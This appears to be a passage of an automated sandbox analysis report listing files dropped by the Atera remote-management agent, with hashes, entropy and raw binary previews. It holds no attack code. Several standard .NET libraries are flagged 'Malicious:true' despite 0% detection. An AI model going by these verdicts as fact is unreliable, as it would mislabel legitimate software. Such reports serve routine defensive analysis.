                                                                                                                                                                                                                                        SHA1:0C5B170ABA511F479E593727CF7F562523EA7E8C
                                                                                                                                                                                                                                        SHA-256:96B51BB87A1F4072D10B774FFADF81AF93881900571D21FE638E10E3FB0220B8
                                                                                                                                                                                                                                        SHA-512:3BAF3836F8F42DF2D3444409115A3564B0961CD3141CC46E248E6E29A59EC773E511477D8DED4BE05125F2F45E987FD6F94AC5676C318A728B7CA63EB78E9056
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................9... ...@....... ..............................;.....@..................................9..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................9......H........4............... ......P ........................................H.W..Q.2.<.L......H.*...W.!".5....8...}P1......#....Z.N..d.....o...P.....@G...g.g..7.w.!V_..4..7.=.G.".8%..q..G....a...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                        Entropy (8bit):4.43329064965383
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ycWWNv/jzSEStoC1vxx6hUltfxx+BE00cUnAPq115rxg0XWr:yc1NvbGVxx6hUltfxgE00cLq5rxg0XWr
                                                                                                                                                                                                                                        MD5:94136496103CA7B4425EB6D639EEC501
                                                                                                                                                                                                                                        SHA1:AC8F3F4E7C04D4BEEFBA94004A114880662C8387
                                                                                                                                                                                                                                        SHA-256:A3A44472A3944FF0D5C31241BF6DD9B6AE04EAE03581D338B53E3E41EED7141D
                                                                                                                                                                                                                                        SHA-512:04F4614C5BCF97EC643079D50FFA800B2F89A503E02D7DA6FF97AA463993A6964833068063C5A144C7E7D44BEAF082B43EA672F66B4E831EC2CE828666C4965B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................n:... ...@....... ...............................x....@................................. :..K....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B................P:......H.......,5............... ..\...P ........................................^M...=..A'R..\N.....U.{..-.Y+........E.?.......3.....#..9.v..2q..?..L..>s.SI.....}...M..Q.=.w....(<.I...,....>^..E..J..X..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                        Entropy (8bit):4.581775279455886
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R/WWNv/jzSEYtPpmKJiDjgmlRFI0HYZDKz/VPH1g5rxg0XWr:R/1NvbdKJiDjgmlRi0HYZDMa5rxg0XWr
                                                                                                                                                                                                                                        MD5:8C7822BE67F1576F2E11817826ABE40E
                                                                                                                                                                                                                                        SHA1:9B9EDD5FEE4415CB7FB09F0940BEAAFF1C107EB7
                                                                                                                                                                                                                                        SHA-256:C9A7CFE32AB4567D671A84397ABDA29CC92B21CB412CE0F0DF12352C68B7460F
                                                                                                                                                                                                                                        SHA-512:70F76DFFB3FE25F1D3550BEC3C168805AB422C6A0505DDDD21EB2A5B59F24D5F37AEDE0DBEBCF16F821868789E17A87AE61442BE6525ECA0461C0146E4E6B850
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................^;... ...@....... ....................................@..................................;..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B................@;......H........6............... ..?...P ......................................S...8cY)..6. .X.YE...W.....*.......r.~@.]\.D.3.....4I...P.u.....Y2Y.n....)@.xV.#g..V.tI.&.gy8....)U..@k..n...FF..w..6.) R.;..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                        Entropy (8bit):4.368843686720491
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:IiWWNv/jzSE5tyT1TNgr1nJIhZAf/07mPk1q5rxg0XWr:31NvbGTNgr1nJI3+07M75rxg0XWr
                                                                                                                                                                                                                                        MD5:79C01911FD90F929CCBD1D4964D2C17A
                                                                                                                                                                                                                                        SHA1:1878855F9C350B245C3258204A754770CAD776A3
                                                                                                                                                                                                                                        SHA-256:E8F0F7F9E9F2D836AAA341A39D3B395B397BAC0B88F6DDED3F159A6C8D2D74A1
                                                                                                                                                                                                                                        SHA-512:0C820224F516FE888621C09E3ED1870AC4B702AB97B1CE3CE4463445FC96F9D8798C97B6AE6ECFF1175D8D8EE8657052AF0E42D03B55340635CF9F5E65A9D6FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................9... ...@....... ....................................@..................................9..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................9......H........4............... ......P ........................................^V..d.~.R.t..i....v=.pIE\..#.}-{.u4....fIk.9.A..G....P_.S.u...w...J.AY....,.v.. ...A..."./..%.z+...".e..:.d....t.G...o................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                        Entropy (8bit):4.593201257102684
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:9SWWNv/jzSEYtq2dE1cxy8ON0Qsk96sPE1V5rxg0XWr:9S1NvbaG1cxy8ONHskd85rxg0XWr
                                                                                                                                                                                                                                        MD5:437252DA54AB3171BC7DE366E5494AD8
                                                                                                                                                                                                                                        SHA1:A4FCFD9240B28C836240D4CAA4C9EC8DE38F6E9F
                                                                                                                                                                                                                                        SHA-256:9BFB9826E286B55AA5A580A5C220114063871B1EA8C541DF783A73EF8E72806B
                                                                                                                                                                                                                                        SHA-512:8D56A2EF0DE3B3BF16FE4D931EE6D6A8119E4CD7B3FFA52AC3EF65CEA2A2F4C4E99ED536757546A54CD5A2318A1BA4E70E6425367402CFD06345FEA6EE8442C0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................;... ...@....... ..............................._....@..................................:..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................:......H........5............... ......P .......................................4....4...L.."...J...%-..............Drc....4.....n.3Cw .r$y.4......%..5[YupFe....R..!`..#h.I..-3..kH..:~ya..P9....PD.}...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10752
                                                                                                                                                                                                                                        Entropy (8bit):4.84740063117937
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:AHwWWNv/jzSEfthb7O9JKggIOrCPPzm394in3fwB/CZPlN1O5rxg0XWr:AQ1NvbH7O9JKgglrCPChnYVC5E5rxg06
                                                                                                                                                                                                                                        MD5:44CC811E193FB220954A0E56AF6F7682
                                                                                                                                                                                                                                        SHA1:B1437F518F3D8E8DEAD506D7E352B69593486244
                                                                                                                                                                                                                                        SHA-256:8CDCF449550DF3F9CACD3A8A41D19D6144BB0FED630825D6118D4077F637BC35
                                                                                                                                                                                                                                        SHA-512:E3FE956494F6179D6A725ECA38FE0E0739A14300DE035093212B0169BED45374E3792EBF7DF916996923777CCB9842C04D9B954D30094D51CE81A892D8F49385
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................~=... ...@....... ....................................@.................................,=..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B................`=......H.......88............... ..e...P .......................................s....E..s....D6..|G....Kc....,..M......8..................}..\.bf..qe.T....w RF..B..y5fW=...N&GE(..[...._.H.....Y.c...ta..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\browser\lib\net6.0\System.Text.Encodings.Web.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71312
                                                                                                                                                                                                                                        Entropy (8bit):6.106692533939604
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:mxuAEP6SHdOP71+KXUk/lsQDzZfOmLeSo0df9Xzlu:eEP6SHdOItSlXfNeSdf9Xxu
                                                                                                                                                                                                                                        MD5:0631D48880E7DDDDE2733C133BA486BB
                                                                                                                                                                                                                                        SHA1:08BDC5C585123FA5F3B4D670DC92CBAA7620725A
                                                                                                                                                                                                                                        SHA-256:AAD8B9A018FC4C4601EDC7C9169370EEE26628C4D90F967C947BA9A81EC4B224
                                                                                                                                                                                                                                        SHA-512:3AD9C20EF888DBD78AD99673E2242ED45006F204FE704076C7791A681849E4A5DDFA9E38862F26DB8203262536E92F1757FDB6982A9FDE1625C3825D89F08A41
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T............"!..0.................. ........@.. .......................`......B.....`.................................x...S.... ...................(...@......x...T............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......,...Lx..........$d................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*^.(...........%...}....*:.(......}....*....0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(......R...(......d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(..... ...._.S...(......d.S*f..._....0X....91...X....*.~....*.0..........(....,..*..(.....o.......&...*..................~~....%-.&.....(....s....%.....*.r...p(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):801048
                                                                                                                                                                                                                                        Entropy (8bit):1.7800450887072108
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:8qirVlWQX3WT56Os1HnhWgN7acWf53p13s5yX01k9z3Agrf8mNVf0nj:8BriQ+5kHRN76HcYR9zPrf8mrf0nj
                                                                                                                                                                                                                                        MD5:7A44C33341844DBE9C6FA526AF88E80A
                                                                                                                                                                                                                                        SHA1:0ACABD100F61A2F8B3C5E68A270599AD54EB8A39
                                                                                                                                                                                                                                        SHA-256:68F73AB17FB7F4AFF3D35EF6DB0E9D5B0FA0151111CB3D03992E23BC29D6C40A
                                                                                                                                                                                                                                        SHA-512:B81D63B345C193C6DEF17372311447D305AE167B2C4D1C2FDB0344D1E1EF5FF4F9D52599FFD862B2480825B308178737DF7E5E48C31E712339F009E92B6EAF57
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|'............" ..0.............&)... ...@....... ....................................`..................................(..O....@..l................)...`.......'..T............................................ ............... ..H............text...,.... ...................... ..`.rsrc...l....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................H'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......`...#Blob......................3..............................................-.....-...0.....M.................R.................h.....7...........[.....x...........D...................................).....1.....9.....I... .Q.....Y.....a.....i.....q.....y...............................#.....#.....+.....3.X...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159904
                                                                                                                                                                                                                                        Entropy (8bit):6.097873216527841
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eXCCOOz54xuTlmyRmIazZ11Ip5ZUWISFogVJoQyaH5MbDiz:Wz5dQ/cpJISF5c8abC
                                                                                                                                                                                                                                        MD5:950CD24EA3A9EFE5CCE594A8B228AFDA
                                                                                                                                                                                                                                        SHA1:4609AC99EBD157E4C9BF7E276EEA961C4BB3AA4F
                                                                                                                                                                                                                                        SHA-256:2AF781190AB7C97D6B846D5027745D609AD227665695E8ECB3AFD4CC9FCE6537
                                                                                                                                                                                                                                        SHA-512:2E8D0DE29E62732458472B8FA5AC35C48416E6AA5034BE309F688A095E6222A215EA3318FA02358707FBB98918983F2AB8996AC6703585485533ED4975AB7E3F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,............" ..0..>...........]... ...`....... ..............................T.....`..................................]..O....`...............H...(...........\..T............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B.................]......H............}...........D..0....\........................................(-...*..(-...*:.(-.....}....*..j ....n_ ....n3..*. ...._ ....`*....0..w...........o.......o.................o.....o/.......o.....o/.....(0.........().....(1..............,..o2.....,..o2.....(3....*.........?Z.......0..K...........o.............o.....o/.....(0....(*....(1.............,..o2.....(3....*.........)8.......0...........(+..........*...0..g.........(...+....o.............o.....o/..............(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.ServiceProcess.ServiceController.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):86816
                                                                                                                                                                                                                                        Entropy (8bit):6.013720216920584
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rqz3g47M9YIB/nRPP6eyO0MIq6y7suFvTbqtN0p7pqHUzH:rq3M5ftPzTLIq6y7sgytNK7p0Uz
                                                                                                                                                                                                                                        MD5:AAB8F9887FA45F30FE04472352E5AFEA
                                                                                                                                                                                                                                        SHA1:8244D05575D13E605B22538D7AE66D4805BC45C0
                                                                                                                                                                                                                                        SHA-256:7DFACED56145F3C6B80DE25A09E0DF6729149EF3C6A8F8F1B559E93B914FD2DE
                                                                                                                                                                                                                                        SHA-512:97BA85978B48324908427833374CB3C19DE01F136D29A3ADCAC350A0555B30087513CD33BB7B18F0CB52CB3E8884E0ACD1BD256704A8B96EA0C4CA8A0F8135CE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............<... ...@....... ....................................`................................./<..O....@.. ............*.. )...`...... ;..T............................................ ............... ..H............text........ ...................... ..`.rsrc... ....@....... ..............@..@.reloc.......`.......(..............@..B................c<......H.......hP..............h)..8....:........................................(&...*^.(&......K...%...}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*6.~'....((...*R.~'....((.....()...*..(*...~'...(+...-..(*....s,...(+...*.*2.{-...(....*.~q...*...0..........(....,..*..(.....o.......&...*..............$....0...........(.......(/...-..,..*.*.(....,.r...p......%...%...(0...*..(1...*.(....,.r...p......%...%...%...(0...*...(2...*.(....,!r...p......%...%...%...%...(0.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9728
                                                                                                                                                                                                                                        Entropy (8bit):4.709151479489131
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:0uWWNv/jzSEhtiBbSEmfO2mdqeCtzEc6yCPVo1L5rxg0XWr:J1NvbcbSEm22mdqet+ws5rxg0XWr
                                                                                                                                                                                                                                        MD5:90289DA899746E328816734D723C93A0
                                                                                                                                                                                                                                        SHA1:6AF8E30872729E89FE0A7C01D99DACF4AE6726CF
                                                                                                                                                                                                                                        SHA-256:2B3853CEBEA222ABB31C2B1E3D6CD19A2F6621ABB56954162751A2B592680676
                                                                                                                                                                                                                                        SHA-512:ABB6FE5216B412CD85E139D69657A40BEEBA00F2DD0DF1795AAD8CF27C13D9CE0EB2DCF3904CA445678D689CE56FA2C169ED7B40490181EA6B770B1A634A6D4B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................8... ...@....... ....................................@..................................8..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................8......H........3............... ......P ..............................................~.Xi.....05.]..sE04.hg.'...../.K'l..a..m..Z....q..m..4&....h....le..|.Z...../.....!*............<.XV$!./..})................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):9728
                                                                                                                                                                                                                                        Entropy (8bit):4.7267524338984295
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:T2WWNv/jzSEhtimYtEq40uI7Sr2fqmxkNeo7R7L7c7xM757odHK9nPo21f5rxg06:a1NvbOtEq40uYSatEdHwWloA9Pb5rxgJ
                                                                                                                                                                                                                                        MD5:2356F25971B72EDBB3303AEA1BEFB9A1
                                                                                                                                                                                                                                        SHA1:60780C3E4F36829A0038BF56CD929148A0A0523C
                                                                                                                                                                                                                                        SHA-256:99C3F55737EBC53BA4EAA92FAAE23EC8AAB9149826E5D821D6BC976706BED237
                                                                                                                                                                                                                                        SHA-512:3252FE8D4A04F4EF79DB76DEB446FBA236E0B281E0B1B35488198D8A5D8EF0F4890ED68DB0E93CA17CE3783B6A6A4D71EF5F8979F917E05D4DDAC638DF082A60
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................8... ...@....... ....................................@..................................8..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................8......H........3............... ......P ........................................u..q.:7i...g.'=......a.2j.V.:}......o.....F5.Sv....v.|...(.':KP.d._..D..s].Nx<..e........k.......P.0...h")g..N.>...@...).6...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1152141
                                                                                                                                                                                                                                        Entropy (8bit):7.9996934105504405
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:Y0MtJOalt7fQwfM+tshGvx5LBhqAc9sDQPfs8+5iaSpFiz:65Lm++hGZ5LnZMO8f+5Aiz
                                                                                                                                                                                                                                        MD5:9A9B1FD85B5F1DCD568A521399A0D057
                                                                                                                                                                                                                                        SHA1:34ED149B290A3A94260D889BA50CB286F1795FA6
                                                                                                                                                                                                                                        SHA-256:88D5A5A4A1B56963D509989B9BE1A914AFE3E9EE25C2D786328DF85DA4A7820D
                                                                                                                                                                                                                                        SHA-512:7C1259DDDFF406FDAADB236BF4C7DFB734C9DA34FD7BAD9994839772E298EBF3F19F02EB0655E773BA82702AA9175337BA4416C561DC2CB604D08E271CC74776
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....}BrX.j5.........-...AgentPackageADRemote/AgentPackageADRemote.exe....0........d......0.....r...,.. UMA...|f-].=.U.j..p.....r..f.<..Z..g}m..LC.T.....Y.{s\.k... Y.....4..}..h.<L......L.........z.i9.K..~.ue."#"r.r..p..0.\./R...C.w..8..-.3.t...(.c..P..N....q.v&........u.a.e...]...9....r.@.=\v..B.~{|c.j.S...JL!g..Y@Ts9D$...)P.......{..8...Y...K...Z._".@.....a.8.P..7...ZY.-D8f\..ej.....@.w.$R>Q.B.....V..@..9....zdB..x..GK.....LDp...Xc......x......*.u..R..,...#...Q,.V....}..W....oT.._6n.g..bK.p.s...pABSv0.7..'.JK ....b.Y.-.B...!'Tjsn...."V......B.@.<CQ.K....>D.5E..w.'. ._%E..-......7.M..u1nr.7....T[.%6..t...Z..Q.;./....k.V....J-.\`..d...K.c. ..D.G.j.../..z..k.KH.....!..M...8....fr.......m....2..4-... ..CF...skN*.kv.E[3."gi3.Uv..*.S...n..~...)..!V..>...D..2..b..}..xW.ZPd..X\.g...1.RY.u.]p..Z b%r.....Hc.N.+[E...Q....3.K.H.....)NQ@L......./2.v..q...*.-:%... "...`...i..+!.D..q.];.ARRrQZ.B. i...M...Qy$.....p...A.U...=...LHF%...]..l.S.pl1....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.139785828189609
                                                                                                                                                                                                                                        Encrypted:false
